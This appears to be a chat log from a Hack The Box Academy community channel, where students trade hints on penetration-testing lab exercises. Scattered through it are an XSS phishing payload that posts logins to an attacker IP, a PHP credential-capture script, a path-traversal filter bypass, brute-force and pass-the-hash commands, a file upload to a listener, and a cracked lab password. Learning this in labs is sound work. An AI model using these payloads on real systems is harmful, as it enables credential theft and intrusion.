#modules
wooow
okay thank u bruh
but how does this work in that way? i'm running malicious script on my machine but it has to be run on the victim's, am i wrong?
and then, following the scenario, i start nc on my machine and wait
read the section
We can download and compile it on a similar kernel of the target system and then transfer it to the target system. Alternatively, if we can compile the code on the target system, then we can do it directly on the target system.
tldr: file transfer OP
OK MSSQL is officially kicking my butt. I have tried turning on xp_cmdshell and OLE. I do not have privs. The module I am working on is attacking common services and attacking sqldatabases
got it, thank u very much ❤️
I have also identified a linked db but cannot connect
check if you can capture hashes
will try that
Can I DM someone about the Advanced XSS and CSRF skill assessment?
@shut question for the timezone, I don't know if that's what's causing my problem, but I don't know how to check if it's good. So how do I know which timezone to put on the machine? I've downloaded the UK VPN I use to connect to Elastic.
Another question: why would that be my problem? The alert shown in the elastic view is from a specific time, isn't it? What difference would it make to set a different time zone to the flag I have to enter?
i have my notes now. did you follow the instructions in the section
if you did then you should have the correct answer
honestly that's all i can say about it
basically, if you follow the section, you get the answer.
Should I do the path of Penetration Tester to gain foundational knowledge then move to Bug Bounty Hunter if my goal is the Senior Web Penetration Tester?
I validated the thing. I feel like I'm losing a few brain cells at times. Thank you for your help 🙂
bug bounty is usually the easier one so it should be the opposite
oh?
but you can try only pentest if you dont wanna hunt bugs n spiders
https://academy.hackthebox.com/module/80/section/848
i'm in the broken auth skill assessment and i'm stuck
this is the question:
Assess the web application and use various techniques to escalate to a privileged user and find a flag in the admin panel. Submit the contents of the flag as your answer.
i figured out what hashes are being used in the cookie but how am i supposed to understand what user i'm supposed to impersonate?
try harder.
am i missing something?
I mean, admin might be a good start
so you think its safe to skip the pentest course if I wanted to focus more on web application type of vulnerabilities and assessments and aim for the CBBH and SWPT?
CBBH and CPTS focus on different things
CPTS has higher focus on active directory and post exploitation.
CBBH is more about just finding the bugs
Then there's CWEE that is about crafting your own exploits for bugs
(Which is why it's an advanced cert)
i think you should google it
others' opinion matter as long as it benefits YOU
I mean here is an OK place to ask, CPTS really won't help with web app stuff
in my current career field im not dealing with much active directory or root level machines
most is cloud/vm and web app /web security like wordpress and other sites
I just thought CPTS was the foundation and the rest you can expand to
i couldnt find much info tbh I googled.
in general if you dont wanna do pentest but like bug bounty, some CPTS modules can help you
no, doing vuln assessment and full pentest are 2 different things
The exams also have their own page which you can read more about them
i got backup.vhd in password attacks lab - hard i cracked its password but don't really know how to run it or what to do next any hints pls ?
the foundation is what you stack ur stuff on, networking fundamentals overlap over the different paths
its shared foundation
most are but not all
There's a link you can search for in the discord regarding mounting it
got it thank you
np fam
You can mount either in linux or windows, both are fairly trivial
I know if I do both it will renew my CISSP
i downloaded the file on my linux machine from smb
u feel like asking chatgpt could help lol
I mean that doesn't really change my statement
extracted the password for it but don't know how to open it or what to exactly do with it
My brother in christ
I just gave you a hint
It's a .vhd file
Google what that extension generally means
You can also run file backup.vhd
im on youtube i'll do my research and be back
I also told you there's literally a link to an article that can help you
You can follow that article almost exactly 1::1
I have a question about the module Pivoting, Tunneling, and Port Forwarding > Choosing The Dig Site & Starting Our Tunnels > Remote/Reverse Port Forwarding with SSH. The text encourages me to do what it does and actually get a reverse shell on the Windows host. However, I can't figure out how they downloaded the payload onto the Windows machine. It seems like they already had command line access to the Windows machine in order to download the payload. However, if they already have command line access, why set up a new reverse shell using the reverse proxy? I am not sure how to keep following along with this specific page
that doesn't mean they had command line access already. for example, what if they obtained code execution through a CMS, and you want to open a reverse shell..
I'm curious if the exercise for https://academy.hackthebox.com/module/147/section/1320 is broken. The hint indicates that the user "kira" exists and implies that the password is contained within the password list. I immediately find kira's password on the smb service. With it, I am unable to login to FTP or SSH. When I use the credentials to enumerate SMB, nothing of value is available.
I checked the HTB forum about this exercise. Someone else indicated they were able to SSH as kira with the cracked password.
I'm thinking that something might be wrong with the exercise....
I didn't see a support option on Academy so I came here. I'm not sure who maintains Academy exercises.
has anyone done the advanced xss and csrf skill assessment and got to admin?
the exercise isn't broken, and works fine for me
try resetting the target and trying with the pw again
Okay, thanks for checking.
I already tried a reset once. I can try it again.
by "immediately" btw do you mean it pops the success right away? or were you meaning like within a minute
bc her pw starts with an l/L (l or L)
so if that's not what you got then back to the drawing board
Interesting... thanks for clearing that up 👍
I got the same result using netexec (smb) and msfconsole (smb_login)
so are you saying the password you obtained does start that way?
that didn't clear anything up for me to be able to sanity check you more lmao
done and found some extra creds hopefully thats it
well backup.vhd is the last step
if that's any indication
any hint how i can "obfuscate" the "." ?
%2e does not work
is it deleting just . or is it removing ../
a popular technique is ....//
that way sanitization removes the first ../ in the middle there, still leaving the second
repeat until root fs
i am in the right directory, i need to read flag.txt
try going backwards to go forward if that makes sense
go back a directory then go forward back and read the file
it flags the .
do it 😉
great ... but tbh one of the easier ones 😄
i mostly enjoyed the hard lab because the back and forth
my fav was AD
Nice work! Password Attacks is one of my favorites.
i mean it took me a couple weeks but now is the real deal i still have active directory, tunneling, and attacking network enterprise
Thank you
Don't forget Attacking common Applications, it has 33 sections
yeah i still haven't covered everything its going to be a long journey i have a friend of mine who spent 10 months to get the CPTS
well we'll get there eventually😅
i am @ it for about 1 month
AD is easy if you have a strong IT background/already know what AD is. if you're just learning about it it can be a bit of a hill to climb i'd say.
its my 3rd or 4th month here
thanks for the response! I tried using bloodhound and windpsearch to find the information required but i don't see any results. Am i climbing up a wrong tree here?
would any of you please help me to put my "." in the syntax without getting flagged ?
luckily I was familiar with some of AD stuff from YT walkthroughs but I still gained a lot
everything is explained but not the damn "." HTB can be mean sometimes
url encode does not work
I mean bh will show it but it's a very common attack with creds
i'll see some course on youtube or read some blogs about it because i always liked doing AD rooms but i really didn't know the logic behind it just a script kiddie throwing random impacket commands hoping 4 something 2 happen
there's a whole AD enumeration and attacks module coming up
in the CPTS path
hmm BH didn't show for me though? Thanks for the nudge!
nvm i do it myself
im talking about the intro to active directory how to use and how it works i'll try 2 dive a little deeper in the basics before going into the module itself
I don't think I did this right.
i was able to do most of the ad enum path without doing the intro module ¯\_(ツ)_/¯
it also doesn't help you're doing as root
it's also looking for an interface on your machine that doesn't exist, but likely exists on the target machine
it also looks like something is fucky
might need to restart your vm
it's saying "too many open files" which is odd
I just wish I understood exactly what I'm doing. I'm following along with the module but don't fully understand each step
I have no idea what chisel is doing or why I'm using proxychains
does the module show you doing it from the context of your machine?
or from the context of another
:)
but again
you should almost never have to switch to root
it sounds like your proxychains file is messed up
or is still open or something
has anyone completed the Advanced XSS and CSRF skill assessment?
That was probably my fault. The module says that it should say "socks5 127.0.0.1 1080" in the .conf file but mine says socks4, so I just changed it to socks5
did you save and close the file
Yeah
restart your vm; as the proxychains file should be saved ¯\_(ツ)_/¯
also run proxychains with sudo; don't switch to root
as root may not have the same proxychains file as your user
(it may not even be in their path at all)
and being honest idek if you need sudo for this but i could be wrong
I needed sudo to edit the krb5.conf file, which I realized after finished all my editing lol
Well I updated from proxychains 3.14 to 4.16 and it didn't do the awful things that it did before
At least it's easier to read the errors now
👍
because it's not a direct edge, it's an attack you can carry out || kerberoast ||
Thank you! I’ll try it when the time allows. Guess i still have much to learn 😅😅
I'm at my wit's end on Pass the Ticket from Linux. I cannot get this ccache file from the DC01 computer I've connected to back to my attacker box
You don't get the ccache from DC01
Well whichever one I got it from. I have the ccache file
you get the ccache of linux01$
I just can't get it back to my box. I got it from linux01 to the spawned VM, but I have no idea how to get it from here. None of the powershell webservers I've looked up will work without admin
I mean
? Why do you need a powershell server, this is from password attacks yeah?
Yeah. And because the box it has you RDP into is windows
you can rdp into linux too
I have chisel on the rdp box connected with chisel on my attacker box so I thought that would be the exfil method, but it doesn't seem to work
link ?
explain the scenario to me. you have your attacker box which is rdp'd into a windows machine, and this windows machine has a ccache file you want to xfer to your attacker box?
Correct. I would just pull it straight from the box it started on, but I can't access it because it's local networked.
That's the first direct question from that section
"Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)." this one ?
Yeah, that's the question.
Oh, wait, it's the question before that
I can't import the ticket because I can't get it to my box
its on the linux box afaik
try this
It is. But the module tells me to get it to my box and then use export KRB5CCNAME= with it on both my box and the linux box
All the required files are on the linux host
python3 -m http.server
Invoke-RestMethod -Uri "http://your-python-server-ip:port/upload" -Method POST -InFile "C:\path\to\your\file"
You don't have to move it to your box
So is the module wrong?
You can do it all from the linux host
You can do it from your attack machine
But it's not required
This is what I was trying to get to
I got the environment variable set on the linux box
I can just do it from there?
That's if you want to carry out the attack via your attack box
sounds like the intended way is chisel and you can't get that working. try my python server method or re-read the chisel part
Intended way is just using the linux host
Lemme see if I can get this to work also
Literally the transfer part is in the optional exercises section
So no. Its not the bare minimum intended method.
Oh, I hadn't gotten that far in the questions. Just going down the list of steps in the module
You already have a domain joined linux host
the second last question right ?
Yeah
Also not every section is a direct 1::1 step by step
I found the one that let me ls the DC01
none is lol
Each user has their own share on dc01
It let me dc01 julio
all i can say is ... do not overthink
You're way overcomplicating it so much lmao
That's typical
I mean if he can ls \\dc01\julio then it's a simple step from there
||smb||
I seriously could ls that folder and just decided to go back and do all that other shit when I could've just immediately connected via smbclient
Yep
Well it's been a learning experience I guess
no worry there will be much more of this lol
The other stuff is purely for practice with transferring to your own system
And executing it from your own machine
The last question [under optional exercises] is the one that has you attempt the whole multi-transfer bit and use julio's ticket to access the C drive
The first question under optional exercises is the one directing you to follow the chisel example
Well transferring it back to my own machine was an abject failure so...
I got an "Message: unsupported method ('Post')" error with this.
http.server doesn't support upload afaik
Ahh
I think it's the python uploadserver thing
Idk I just have a running nginx server that has an upload port/folder
did you rdp from linux > windows ?
Yeah
I have a python uploadserver running now. Just gotta figure out the right syntax for the transfer
Remmina allows copy pasting?
you can have a shared drive , yes
look into options
not on quick connect
or you can open a python ftp server
or or or
file transfer is easy 😉
I'm good with file transfers from linux > linux. Windows I'm not comfortable with
if the windows host has an ssh server running (or if the linux host has ssh running)
I wish that the modules would give me some clue about what wordlist to use. The module uses rockyou.txt but it doesn't work for this one lol
question about url encoding. specifically command injection: when i url encode why do i get 3 different encodings depending on where i encode it? (1 with burp, 1 with url encode/decode website, 1 with the course material)
Finished File Upload Attacks finally
generally you're gonna use the mutated wordlist in the password attack module
also save all creds you find in that module
they come back a few times throughout (except the skill assessment)
Anyone still having problems with ffuf killing vm connections?
Breezed through the Injection Attacks Modules for Sr. Web & getting absolutely crushed by the Skill Assessment - 2 days and counting :\
I realized that lol. I had to go back and find old answers
one might be able to say: skill issue
(gl though, the modules look like they're no joke)
this reads like you just threw it into chatGPT
but yes \n is a special character to represent new-line (similar to \r which is the carriage return)
Keep the channels on topic, thanks.
i'm just stating how I read it lol
sounds very roboty
that's all
(not saying it's a bad thing)
I also just solved this skill assessment, wasted a couple of hours using the wrong exploit method at first, got a hint from the history message
Maybe you were doing a different one? This one was a Hardware Shop
Im stuck on Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the two IP addresses of the C2 callback server. Answer format: 10.0.0.1XX and 10.0.0.XX on Module UNDERSTANDING LOG SOURCES & INVESTIGATING WITH SPLUNK Section Intrusion Detection With Splunk (Real-world Scenario)
Injection Attacks Modules skill assessment
Just put it here, I got a hint from these historical messages
@cedar granite i can't click it - I feel less of a human when I find hints bc they divulge too much sometimes and then I feel like I didn't really solve it. Have to struggle 😉 going to reread all the material and try everything lol
Hey I'm stuck on enumerating with nmap nmap scripting engine. It's asking us to scan the target with a script obviously to find the flag which I've done and a flag was shown to me on my first scan however this is the incorrect answer apparently
make sure there are no whitespaces when submitting.
Turns out I was completely wrong and using the wrong port but I figured it out
I need some clarification on SQL injection fundamentals.
Question in Question:
In the 'titles' table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?
Can someone explain to me why the answer to this question is the answer that it is? I already have the answer but it makes no sense.
SQL operators section
so; you're basically getting the count where the employee (ID) number is > 10000 or title isn't 'engineer'; since it's an or statement it's processed in order. the > 10000 is processed first, if it's true then it doesn't check the second statement. if the first statement is false then it looks for the job title in which it would be not "engineer"
so basically you can think of it as querying 2 separate objects
you're querying for > 10000 and not engineer then combining the two - the query with the OR statement doesn't include duplicate values
and it's an in-order operation
meaning it will run check A before check B in the case of A OR B
if A passes it does not check B
so you can have an engineer with ID > 10000 because it's an A OR B, not A AND B
So what is the purpose of running that command when you can just SELECT * from table and the count will still be the same ??
it won't be
because you can have a not engineer be < 10000
if A returns false, check B
if both return false, return no count
First of all, in DBMS records means rows.
And using OR operator; takes two statements, and return true when at least one of them evaluates as true
So with this knowledge;
You’re querying all the records in the titles table but the WHERE clause would only return employee numbers > 10000 OR that title won’t contain ‘engineer’ field.
^
Oh actually you guys both answered it
so you're looking for all records in the DB where A OR B is true
because all records are over 10000 so checking for b will not yield
you mean all values in the column "employee number" are >10000?
you're not checking the record amount
you're literally checking the employee ID # that's assigned in that column
^ Pretty much.
Just keep this logic at the back of your mind.
I.E. the first person employed would likely be employee #<leading0s>1
employee # in this question isn't referring to the records in the database
Yea, everything you guys are saying is making perfect sense, but the way the exercise is set up is confusing, should I send screenshots?
Exactly that’s why I initially stated that records = rows
Sure
with DBMS you're asking where columnA.value [operator] condition OR columnB.value [operator] condition and returning a value when A or B is true
in this case the value that would be returned would be an incremental count
this sort of query is used in real life to manage and view employee records
Check it out, I can get the same answer by just running the simple sql SELECT * FROM table; command as I would running the command @fathom pendant is stating that consists of the OR parameter
youre looking for this
I know check it out
Thats what SELECT * FROM **** ; yields
but I also get the same answer when I run SELECT * FROM table WHERE a > # OR a != "title";
obviously configured accordingly
do me a favor
run a count of all the records; then do a count with just the > 10000 query
you're likely seeing a truncated version of the table
I understand the material and everything you guys are saying I just don't get why they would set up the exercise like this.
Okay @fathom pendant one sec
If i'm remembering correctly the not "engineer" query only excludes specifically engineer not senior engineer no?
it's been a hot minute since i messed with SQL
Yes senior engineer still yields... here's what I got with your request
Here's all the records
and then here is your > 10000 query
tbh the more records the longer it would take to run a query
I didn't mean to send the screen shot without the spoiler warning
so if it truly was a >10k table it would take several minutes to query, likely
Yeah, I'm not entirely sure what was to be taken away from that exercise considering the answer is there by default
but i believe the exercise is more to just get you used to doing different operators
rather than focusing on the pure content
Gotcha
That makes sense, I just wanted to make sure I wasn't overlooking something. I will say though I did not know that if one condition was met then the other one was disregarded after what you had told me, so I learned something either way🤷♂️
yeah it does but because of the OR Operator it pretty much means SELECT * FROM titles;
yes it was set up that way lol
if you got the correct answer then it's not something to really think about
perhaps an erratum is needed if something is wrong
In terms of future case scenarios I just wanted to verify I understood the material properly
ye
I believe it's more of a case of showcasing how OR works
as in even if B would be false, A is true so it doesn't matter
^
which IMO is a dumb way to showcase it
BUT it's something set up to be always true
tbh I even thought the record emp_no started from 1.
yeah imo it would be better to have some random ones thrown in there that are < 10k and not engineer
like 6969 | Senior Engineer or something
So reading through some of these previous messages, I'm on SSTI Example 1 looking to install tplmap and I'm trying to do so on kali, getting errors with python2 pip installs and errors with collection methods and yaml things, a whole mess. Has anyone recently been able to install it properly? I can get it on pwnbox but I'd like to do so from my VM. Not really sure what kali's issue is here.
Skill Assessment - Injection Attacks (Senior Web Pentester Path)
For those who completed this, was ||XCAT|| useful or was ||burp|| more useful? I can get ||LFI|| but can't seem to figure out the ||XPATH injection.||
burp
In Window Privilege Escalation - Skill Assessment I I found ldapadmin account password using Lazagne. Is there another way to find it?
Update for any others
python2 -m pip install virtualenv
virtualenv -p /usr/bin/python2 venv
source venv/bin/activate
Make it work.
Not a python genius so this took me too long to figure out
Hello, within ADCS Attacks in the ESC1 section I am having problems in the 'Use TGT to connect to the DC' step. When I run the command it specifies it does not seem to work and just errors every time. I have tried adding '10.129.123.1 LAB-DC.LAB.LOCAL' to the /etc/hosts of my machine as well as trying to add '10.129.123.1 lab.local' to my /etc/hosts to see if that might be the issue, to no success. I'm a bit stumped here and unsure what to do next or how to get it to work
add the domain name too
What do you mean
when dealing with kerberos, always add 3 things to /etc/hosts for dc's ip: hostname, domain name and fqdn
Wooow I can't believe it was that simple, thank you so much for clarifying that. I feel quite dumb not realizing it, certainly going in the notes
In the command injections module specifically the identify filter section the question asks:
Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?
None of them are working so I'm wondering if I'm doing something wrong here. I know what the answer is supposed to be, but all three of these operators are getting blocked for me.
Edit: never mind was a layer 8 issue
Hello guys,
skill assessment: SIEM Module (CDSA)
I've done all the other labs within the module but when I am solving the last assessment I am very confused and failing to understand when to "escalate" and "consult to it", can anyone please help me.
Thanks in advance.
this sense is something you develop over time. There are a few things that are "ok this is an attack, no way that happens on accident" like 1.000 login attempts within a minute or someone trying to access a long deactivated account or honeypot. There you can escalate directly. Then there's cases where you know something shouldn't be happening, but you also know they still are because people aren't following protocol (like in the assessment it mentions admins like to rdp into the dc from their own computers, even though they shouldn't anymore). There you may not have to escalate directly, but you can talk to them first
often there is no 100% right answer, so dw too much about this
Got it. Are there any lab solutions for it, i want to know the exact reason for the correct answers.
I doubt anything official exists for this
if it's a tier 1 or 2 module then no
there will be no official guide/solution workflow for it
hi guys
does anyone got issue with the Skills Assessment - File Upload Attacks?
i've intercepted the only uploadable path with a png image and got nothing on burp, no data at all
i've read the source code of /contact, /contact/script.js, /contact/upload.php, /contact/submit.php
nothing of interest except for regex etc.. is the lab broken or am i just dumb, i've restarted both ip and machine env multiple times
tried to manipulate blindly the http request by adding headers and modifying the http form as well, content-type, mime etc.. but nothing would work
- when going to http://IP:PORT/contact/upload.php i right away got the "Thank you for submitting your feedback" message...
the weirdest thing is that since the GET url work with no data parsed in it, i can named the file njdlw.lwcljsbvclkv and it'll still work obviously
anybody can help on password attacks - protected files
i cant seem to convert to ssh.hashes it gives an error
Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'
i guess i need to install python 2 :c
yep it worked thanks
completed 32/33 from "Attacking Common Applications" module - I just cannot get the last SQLi part to work on "Exploiting Web Vulnerabilities in Thick-Client Applications" why am I editing java in notepad on a laggy windows vm that disconnects every 3 mins? - anyone able to help me out?
you can transfer the file to your own vm and use a proper code editor
Module: Intro to Assembly Language
Section: Skills Assessment
I need some help on the first task, I’ve edited the assembly code and xor d with rbx but not sure if it’s correct and how to use that to get the answer. Can someone help me please?
script vuln works too. /xxxx is shows at the end aswell so i just visited on the browser
Anyone else having problems getting into windows virtual machines right now?
Hi, I don't understand why it has to be shellcode to get it run, can I just run it using ./assembler.sh loaded_shellcode.s?
the instruction is to
Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode
I got some null bytes when use call , how do I get rid of those null bytes? b0: e8 07 00 00 00 call 0xbc
b5: e8 0d 00 00 00 call 0xc7
did anyone do the broken authentication skill assessment and can help me out?
im pretty sure im doing everything right and still not getting the flag
I'm not sure what you're doing, there's no need to use call, just xor the values
can I DM you? still can't figure out how to get rid of those null bytes
you can send a screenshot of your gdb or what you're trying to do, there shouldn't be any null bytes anywhere
read and follow #welcome so that you can post screenshots
I will get back to you tomorrow, too tired now, thank you for your help
This is making it hard to do brute force password attacks in a module teaching password attacks lol
i have a problem with XSS session hijacking,
[Thu Mar 7 08:31:47 2024] PHP 8.2.10 Development Server (http://0.0.0.0:8000) started
[Thu Mar 7 08:32:13 2024] 10.129.165.108:46512 Accepted
[Thu Mar 7 08:32:13 2024] 10.129.165.108:46512 [200]: GET /script.js
[Thu Mar 7 08:32:13 2024] 10.129.165.108:46512 Closing
[Thu Mar 7 08:32:14 2024] 10.129.165.108:46514 Accepted
[Thu Mar 7 08:32:14 2024] 10.129.165.108:46514 Closed without sending a request; it was probably just an unused speculative preconnection
[Thu Mar 7 08:32:14 2024] 10.129.165.108:46514 Closing
Hello guys, I do have a question regarding Network enumeration with Nmap module on HTB Academy. There it states the following
The Connect scan is useful because it is the most accurate way to determine the state of a port, and it is also the most stealthy. Unlike other types of scans, such as the SYN scan, the Connect scan does not leave any unfinished connections or unsent packets on the target host, which makes it less likely to be detected by intrusion detection systems (IDS) or intrusion prevention systems (IPS).
And I am kind of confused with that statement, isn't the Connect scan actually considered unstealthy? Because by that you perform the 3 way handshake and that makes it noisy, as if someone, let's say the administrator, goes to the windows event viewer, it could see us very well, whereas if you perform the scan without performing the 3 way handshake the event never goes to the event viewer, or am I wrong with that understanding?
What would your guys suggestions be for someone just starting out. Which 5 modules should I do first?
I'd go through the fundamentals for understanding the website and how modules work, then once you've done that consider the pre-requisites for a job role path you're interested in perhaps
Also, would be great if anyone could help me out. I have powerview on the virtual machine but when I put in the command prompted it says that the term is not recognised, do I need the ps1 mentioned in the command? [Windows Attack & Defense]
have you imported it?
Just realised, thanks though
Academy down?
i haven't had issues so far, but i'm in the US. there's a banner up on my screen though " Scheduled Maintenance on EU Academy 2 VPN today EU Academy 2 will be unavailable 13:00-16:00 UTC.Please utilize other VPN servers during this time. "
are you on that EU 2 vpn?
yep that is the issue
try another vpn server
website is down
website up for me
i'm able to load my dashboard without issue
and now i can't lol
oh wait it did load just took a second
Wow man, unethical.
if you're good enough to hack american tech giants you should probably just go get a regular job and make way more than offering your services on discord my guy
😂
Same here!
And all from your mommy's basement!
Would like to bump that
What is going to be the next HTB module to come out? Is it posted anywhere?
i wish its tier 2 or less 😥
IDS and IPS systems can view unfinished connections as more suspect (varies on rules), it's true
Thank you, appreciate that clarification
Unfinished connections often represent incomplete handshakes in network communication. For example, if a TCP handshake is initiated but not completed, it could indicate an attempt to establish unauthorized connections or reconnaissance activity by an attacker.
checkout pathways
i think there is something for starting
Many thanks because this was driving me crazy 😅
anyways website is down so you cant check rn 😅
its not down though
Hey guys i still need help with the broken authentication skill assessment would love some help
https://academy.hackthebox.com/module/80/section/848
i've cracked the cookie + identified some users, and when i filtered rockyou.txt by the password rules it came back with only two passwords which did not work on any of the accounts. i'm stuck and have no idea how to progress from here
please help🥲
hey, just completed the nmap Hard lab from the Firewall IDS/IPS module, but got a question based on it, even after reading the manual of the tool used. if someone would ping me so i can dm, much appreciated
you're basically acting as if the scan is coming from a trusted source (DNS) querying for info; a SYN scan also doesn't fully connect which allows filtered ports to be seen
oh yea no i mean i understand that
ill put my screenshot, if it contains too much info ill delete it
i dont understand why it fails first time but second time works
source port
and -p are the same thing
it contains a spoiler because ncat shows the port in which you're connecting to
also: sometimes it can just be dumb
and the initial connection can timeout
deleted sorry.
that's just sometimes how ports respond
im pretty sure i hammered that port like 2 hours ago. and nothing came out..... ffs
also if a port is configured in a certain way; it can temporarily close if too many requests hit it at once
ic
iirc the lab is designed that if you generate too much noise on it you get temp-banned
so you gotta wait that timer out (or restart it)
it could be that you just incidentally have just waited the timer out
yea easy lab was with the status warning after 100 attempts or smthing
the others didnt show
http, not https
port 443 isn't open for https
i hate that...
yea i guess it automatically threw me to 443
and i didnt check that thats me being stupid ....
yeah that's a setting you might wanna disable in firefox
yea its a fresh install on parrot. on linux i have that
tytyty makes sense now. would prob have been done with it waaay earlier and wouldn't have had to check some tips to get to the end
👍
i got through all the labs without once triggering it
but i heard it's like several minutes, which sounds like suck
yea it def would have made it easier without triggering it / knowing when it was triggered.
i did medium without any trigger, and on easy i triggered it once to see what happens, and at least for easy it's like a 3min ban
so it's very likely you did an oops while trying to figure out how to be sneaky
question about CPTS, are these HARD modules easier than CPTS? working towards it
i mean from what I know, the CPTS exam is challenging
but is doable if you just KISS
[Keep It Simple Stupid]
a lot of people have said some of their hurdles were just thinking dumber
yea right! yea sometimes you just need to step back and the flag is easier than you think.
"no way it's [user has sudo perms and can privesc without care]"
no way something like that would exist
rather not test it and keep going down the rabbit hole
step 0 enumerate
it's something i tell people when something basic they're goofing up in a module
and it's clear they missed something in their enum phase
Yea
btw you havent done cpts? You planning to?
eventually
life events happened and i haven't been in a place to finish the course
anyone can give me hint on XSS final assessment? i cant get the cookie
have already changed 3 servers
Understandable.
Said to myself OSCP was too pricey, and in the meantime, while I'm moving countries and looking for a job, I should get my cert.
hi, any suggestions for some reporting tool for windows or mac please? 🙏🏻😬
Simple Markdown is cool. Usually you can convert markdown into other file formats when you need to
Password Attacks Lab - Medium
so I was able to get the zip file from the smb and cracked it, and also cracked the docx inside. got j**** creds and then d**** creds, and now I'm logged in as dennis, so from here I presume I need to escalate to root. any tips?
obsidian
just look for whatever d has access to
reuse of creds also goes wild
i dont really get it can you elaborate more?
nope
i'll refer to my earlier comment
Enumerate
just look around
got it now i was looking at the answer for a long time and ignoring it
ffffffffff
DA will have rights over the whole domain
looking at how tiny the scroll bar is for the code analysis section in malware analysis
Would anyone be able to provide some guidance?
Module: HTTPS/TLS Attacks
Chapter: POODLE & BEAST
Hi I am in XSS injection module,
why am I facing this error
well it looks like you don't have a username defined
in your php login
I need to capture the username, so why would I define it?
it means that you didn't define a variable for username
¯_(ツ)_/¯
well, looks like it's pulling from creds.txt
I am in the Attacking Common Services Module on SQL.
||I captured a hash. and cracked it. I tried to authenticate as mssqlsvc using mssqlclient.py. I cant go in that way. Tried to pass the hash too using the same. tried sqsh still nothing. I just need to find a way to get privs to enum the FlagDB. ||What am I missing?
I used touch to create a file
here are the commands I used:
||mssqlclient.py -p 1433 mssqlsvc@10.129.180.219
mssqlclient.py mssqlsvc@10.129.180.219 -hashes :2648801DD5C4392C6D58CC7E317BC0CF||
I guess there is a problem with the payload maybe?
'> <h3>Please login to continue</h3><form action=http://10.10.16.109><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>'); document.getElementById('urlform').remove(); <!----
well look at the error, the error seems to be coming from index.php
says error on line 2
you're missing a )
referring to line 4? also it looks like an extra "
i don't see where the paired " is
this?
ah nah i'm wrong
ah missed that
yep
<?php
if (isset($_GET[username]) && isset($_GET[password])) {
$file = fopen("creds.txt", "a+");
fputs($file, "Username: {$_GET[username]} | Password: {$_GET[password]}");
header("Location: http://10.129.131.194/phishing/index.php");
fclose($file);
exit();
}
?>
its still an error
that's not the right hash, no idea where you got that from
and how did you capture a ntlm v1 hash?
put single quotes around username and password
responder and dirtree lemme give you the full output
if (isset($_GET['username']) && isset($_GET['password']))
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
$file = fopen("creds.txt", "a+");
fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}");
header("Location: http://10.129.131.194/phishing/index.php");
fclose($file);
exit();
}
?>
||[SMB] NTLMv2-SSP Client : 10.129.180.219
[SMB] NTLMv2-SSP Username : WIN-02\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::WIN-02:6cf2a177ccc483a...||
above
i put your code into chatgpt and asked why it didn't work, it spit out calculac0re's script
clearly there's an error in the php code
yep its working now
that's not how you use a ntlmv2 hash, you can't just take out a portion and use it to pth, ntlmv2 is only good for cracking or relaying
Thanks
we love quotes
So, I would provide the full hash including user:domain? I tried that initially but i got " too many values to unpack (expected 2)
you can't pth with ntlmv2, crack it
Thanks. that is good to know.
already did with john.
tried authenticating with that pass with mssqlclient.py and sqsh. No dice, but I wasnt able to with sqsh anyway for the htbdbuser, had to use mssqlclient
"No dice" doesn't mean anything, what's the error?
Thanks for the continued help. Here is what I have consistently got:
||mssqlclient.py mssqlsvc@10.129.180.219
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
Password:
[*] Encryption required, switching to TLS
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user 'mssqlsvc'.
sqsh -S 10.129.180.219 -U mssqlsvc -P 'princess1' -h
sqsh-3.0 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
Open Client Message
Layer 6, Origin 8, Severity 5, Number 3
ct_connect(): directory service layer: internal directory control layer error:
Requested server name not found.||
try with -windows-auth for mssqlclient
Hi everyone, I'm back. LOL Sorry to bother you. I would like to ask those more expert than me for a suggestion. I'm in the ''Attacking Common Services'' module and I can't understand where I'm going wrong. The second question asks me to find the password. I'm using this command: hydra -l marlin@inlanefreight.htb -p /home/kali/Desktop/pws/pws.list -f 10.129.203.12 pop3 , which is the only one that offers the tab. The result it gives me is empty, it just gives me white space without anything. Can anyone give me a hint?
don't use the @inlanefreight.htb
just marlin and that's it?
yes
idk dude
😢
also
your password list seems awfully small
it looks like it's only one password
meaning that's why it's failing
there are actually 334 words in the pws.list file
well according to the hydra output
there's not
also i believe it's -P for a list
strange
but i could be thinking of the netexec/crackmapexec syntax
that's correct, -P for list
yeah
you're using -p so it's using the line as the password, not the file
you're passing it the literal string /home/kali/Desktop/pws/pws.list as the password
now it's running
hydra -l username -P wordlist.txt -v -s <port> <server> <service>
-l <username> | -L <LIST> ; -p <password> | -P [LIST]
don't use the @inlanefreight.htb
dont work
in this forum it said to use the command as if it were an email, i.e. @inla...htb https://forum.hackthebox.com/t/attacking-common-services-attacking-email-services-smtp/258990/34
now i try
oh wait yeah i was thinking of a different section where you drop the @domain
mb for that
so I have to use the @ sign, correct?
the pop3s port appears to be filtered and not open
could just be that protocol is just being dumb
ah ok couldn't recall for that lab
you could also create a user.txt and input both usernames just to rule one out
then use -L instead of -l
so it's saying your execution of the command was successful, but it did not bruteforce the password. so either the username is wrong, or your password list isn't good enough
did you use the pws.list given by the module?
yes
Good evening friends. Lately my RDP is just black when I try and log in. It seems to do it a lot. Then work for no reason, drop not let me back on, etc. Is there something I should be doing to get a more reliable connection?
and which password list can I use? I used the module resources one
what's the md5sum of the pws.list file you're using?
the username is copied and pasted
username should be right
In what sense? I downloaded the file from the site and used it in the script, I didn't change anything
this is the user
the username is correct
and i just ran the attack myself
it works
md5sum is just a checksum verification
so that you know the file didn't get corrupted in transfer
